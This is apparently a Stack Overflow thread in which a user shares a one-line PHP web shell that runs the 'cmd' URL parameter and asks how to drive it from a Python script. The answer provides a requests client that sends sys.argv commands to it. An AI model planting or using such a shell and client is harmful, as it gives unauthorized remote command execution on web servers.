passing an argument as a command in python

Question

I created a php file that allow me to execute commands in the url. the php file and the url in the following quotes:

<?php

system($_GET['cmd']);

?>

the url is:

www.somewebsite.com/..././command.php?cmd=id

so here I used the command "id" and the output was:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now, I want to write a python script that pass the command I want as an argument and return the output in the terminal instead of executing the command in the browser.

This is my code so far:

import sys
import requests
import re
import webbrowser


url = 'http://localhost/.././command.php?cmd='

def remote():
   webbrowser.open('url')




def main():


   remote()

My problem is how to pass an argument as a command? like: python do.py id

Thanks in advance.

You should learn some basic Python first. Hint: use the `sys` module. — ForceBru, Jul 23 '17 at 20:04
Bigger hint: https://stackoverflow.com/questions/4117530/sys-argv1-meaning-in-script — cs95, Jul 23 '17 at 20:06
A good StackOverflow question would be focused on the specific thing you don't know how to do. For instance, trying to figure out how to retrieve a piece of data from the command line into a variable, or figuring out how to substitute a variable into a string. That said, it's overwhelmingly likely that there *already will exist* an answered question covering any such components -- so you should be able to figure out everything you need to do by breaking down your problem into smaller pieces, and searching StackOverflow (and/or the Python docs) for help with those individual pieces. — Charles Duffy, Jul 23 '17 at 20:06
BTW, `webbrowser` is overkill here -- there's no reason to get a browser involved when all you need is a HTTP request, and you *don't* need a JavaScript engine and all that mess behind it. Indeed, you're opening yourself up to someone trying to fingerprint you or take advantage of other vulnerabilities in the broad attack surface a browser offers. — Charles Duffy, Jul 23 '17 at 20:09

Trishant Pahwa · Answer 1 · 2017-07-23T20:41:23.670

0

You are probably looking for this:

import requests
import sys

url = 'http://localhost/.././command.php?cmd='
command = str(sys.argv[1])

response = requests.get(url + command)
print response.content

You might need to install the requests module. You can do that easily using pip.

edited Jul 23 '17 at 20:41

answered Jul 23 '17 at 20:12

Trishant Pahwa

2,559
2
14
31

That works, but I want the command to be passed in the command line instead of changing the variable "command" each time I want to execute different command! – Core Jul 23 '17 at 20:33
Edited please verify – Trishant Pahwa Jul 23 '17 at 20:35
Have you considered using `sys.argv[]` ? `sys.argv[0]` : script name `sys.argv[1]` : the first parameter passed to your script – scorpGoku Jul 23 '17 at 20:36
Accept the answer can you please? Thanks. – Trishant Pahwa Jul 23 '17 at 20:40
I used sys.argv[1:] because the first element is the script name and from [1:] is the command. however I got an error: TypeError: cannot concatenate 'str' and 'list' objects – Core Jul 23 '17 at 20:40
I solved it. I had to use str function with the sys.argv. Thanks – Core Jul 23 '17 at 20:43

passing an argument as a command in python

1 Answers1